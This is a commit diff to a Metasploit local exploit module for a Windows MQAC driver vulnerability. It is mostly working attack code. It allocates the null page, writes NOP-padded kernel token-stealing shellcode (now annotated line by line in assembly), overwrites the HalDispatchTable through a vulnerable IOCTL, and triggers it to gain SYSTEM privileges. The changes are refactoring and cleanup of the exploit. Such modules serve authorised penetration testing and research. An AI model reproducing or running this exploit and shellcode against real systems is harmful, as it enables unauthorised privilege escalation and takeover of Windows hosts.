Lots and cleanups based on PR feed back

Author: zeroSteiner

modules/exploits/windows/local/mqac_write.rb

@@ -83,12 +83,13 @@ def get_system_proc
     local_sys = resolve_sid("S-1-5-18")
     system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
 
+    this_pid = session.sys.process.getpid
     # Processes that can Blue Screen a host if migrated in to
     dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
     session.sys.process.processes.each do |p|
       # Check we are not migrating to a process that can BSOD the host
       next if dangerous_processes.include?(p["name"])
-      next if p["pid"] == session.sys.process.getpid
+      next if p["pid"] == this_pid
       next if p["pid"] == 4
       next if p["user"] != system_account_name
       return p
@@ -136,19 +137,20 @@ def exploit
       return
     end
 
-    this_proc = session.sys.process.open
     kernel_info = find_sys_base(nil)
     base_addr = 0xffff
     print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
     handle = open_device
     return if handle.nil?
 
-    if not this_proc.memory.writable?(base_addr)
-      result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
+    this_proc = session.sys.process.open
+    unless this_proc.memory.writable?(base_addr)
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
     end
-    if not this_proc.memory.writable?(base_addr)
+    unless this_proc.memory.writable?(base_addr)
       print_error('Failed to properly allocate memory')
+      this_proc.close
       return
     end
 
@@ -160,34 +162,33 @@ def exploit
     halDispatchTable += kernel_info[0]
     print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
 
-    tokenstealing  = "\x31\xc0"
-    tokenstealing << "\x52"
-    tokenstealing << "\x53"
-    tokenstealing << "\x33\xc0"
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
-    tokenstealing << "\x8b\x40" + target['_KPROCESS']
-    tokenstealing << "\x8b\xc8"
-    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x89\x1d\x00\x09\x02\x00"
-    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"
-    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"
-    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
-    tokenstealing << "\x75\xe8"
-    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x8b\xc1"
-    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"
-    tokenstealing << "\x5b"
-    tokenstealing << "\x5a"
-    tokenstealing << "\xc2\x10"
+    tokenstealing  = "\x52"                                                        # push edx                         # Save edx on the stack
+    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
+    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
+    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
+    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
+    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
+    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
+    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
+    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
+    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
+    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
+    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
+    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
+    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
 
     shellcode = make_nops(0x200) + tokenstealing
     this_proc.memory.write(0x1, shellcode)
+    this_proc.close
 
     print_status("Triggering vulnerable IOCTL")
     session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
     result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
-    if not is_system?
+    unless is_system?
       print_error("Exploit failed")
       return
     end